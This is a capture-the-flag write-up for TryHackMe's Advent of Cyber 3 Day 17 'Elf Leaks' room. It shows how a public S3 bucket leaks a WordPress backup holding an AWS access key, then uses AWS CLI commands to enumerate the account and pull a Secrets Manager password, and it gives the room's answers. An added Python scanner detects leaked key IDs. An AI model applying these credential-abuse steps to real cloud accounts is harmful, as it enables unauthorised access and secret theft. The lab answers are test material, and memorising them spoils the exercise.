Advent of Cyber 3 (2021): Day 17 Write-up Elf Leaks [TryHackMe]

Atharva Shirude
Published in rootissh, Dec 24, 2021

Hey Guys! We are back with Day 17 of the “Advent of Cyber” event by TryHackMe. If you haven’t solved the Day 1 challenge click here.

This time we have a cloud challenge named “Elf Leaks”.

Today’s Learning Objective

Today we’ll be covering the basics of AWS — one of the leading public cloud providers, and two of its most common services — Amazon S3 (Simple Storage Service) and AWS IAM (Identity and Access Management).

We’ll show you how to get started with the AWS CLI, then describe how to discover public S3 buckets and look at what’s inside. We will also look at how you could leverage an IAM Access Key & Secret.

Let’s Get Started..

1. What is the name of the S3 Bucket used to host the HR Website announcement?

Open the image in a new tab and you’ll see the link.

Answer: images.bestfestivalcompany.com

2. What is the message left in the flag.txt object from that bucket?

Link: https://s3.amazonaws.com/images.bestfestivalcompany.com/flag.txt

Answer: It's easy to get your elves data when you leave it so easy to find!

3. What other file in that bucket looks interesting to you?

Answer: wp-backup.zip

4. What is the AWS Access Key ID in that file?

Go to the link for wp-backup.zip: https://s3.amazonaws.com/images.bestfestivalcompany.com/wp-backup.zip and the file will be downloaded.

Unzip it, go to that directory and search for the Access Key ID using grep:

cat * | grep AKIA
We find it in the file wp-config.php.
Answer: AKIAQI52OJVCPZXFYAOI
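
The same search works as a pre-upload check on the defender's side. The following is an added example, not part of the original write-up or the TryHackMe room: it scans a zip archive in memory for AWS access key ID patterns and reports which member holds them. The sample archive, the `S3_UPLOADS_KEY` constant and the function names are constructed for illustration, and the key is the example ID from AWS documentation.

```python
import io
import re
import zipfile

# AKIA = long-term IAM user key, ASIA = temporary STS key; both are 20 chars.
KEY_ID = re.compile(r"(?<![A-Z0-9])(AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
MAX_MEMBER_BYTES = 5 * 1024 * 1024  # assumption: skip very large members


def mask(key_id):
    """Show enough of the ID to locate it in IAM without re-leaking it in logs."""
    return key_id[:4] + "*" * 12 + key_id[-4:]


def scan_archive(data):
    """Return (member, line_no, masked_key_id) for every key ID inside a zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            text = zf.read(info).decode("utf-8", errors="ignore")
            for line_no, line in enumerate(text.splitlines(), start=1):
                for match in KEY_ID.finditer(line):
                    findings.append((info.filename, line_no, mask(match.group(0))))
    return findings


def build_sample_backup():
    """Constructed stand-in for a WordPress backup; the key is AWS's documented example ID."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("wp-backup/index.php", "<?php // nothing sensitive here\n")
        zf.writestr(
            "wp-backup/wp-config.php",
            "<?php\ndefine('DB_NAME', 'wordpress');\n"
            "define('S3_UPLOADS_KEY', 'AKIAIOSFODNN7EXAMPLE');\n",  # hypothetical constant
        )
    return buf.getvalue()


if __name__ == "__main__":
    hits = scan_archive(build_sample_backup())
    for member, line_no, key in hits:
        print(f"{member}:{line_no}: AWS access key ID {key}")
    raise SystemExit(1 if hits else 0)  # non-zero exit blocks the upload step
```

Run against a real backup by passing the file's bytes to `scan_archive`; any finding means the key should be removed from the archive and rotated before anything is published.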

5. What is the AWS Account ID that access-key works for?

For this, you’ll first have to configure the AWS CLI with a profile name.

We’ll keep our profile name as hacker for this one.

aws configure --profile hacker
aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile hacker
Answer: 019181489476

6. What is the Username for that access-key?

aws sts get-caller-identity --profile hacker
Answer: ElfMcHR@bfc.com

7. There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?

aws ec2 describe-instances --output text --profile hacker
Answer: HR-Portal

8. What is the database password stored in Secrets Manager?

aws secretsmanager get-secret-value --secret-id HR-Password --profile hacker --region eu-north-1
Answer: Winter2021!

Thank you for reading! See you tomorrow!!

Please clap👏 if you like what we are doing and drop your thoughts and love❤️ in the comment section.

Do Follow us on our LinkedIn: https://www.linkedin.com/company/rootissh

Stay tuned for more write-ups of this event as well as others!
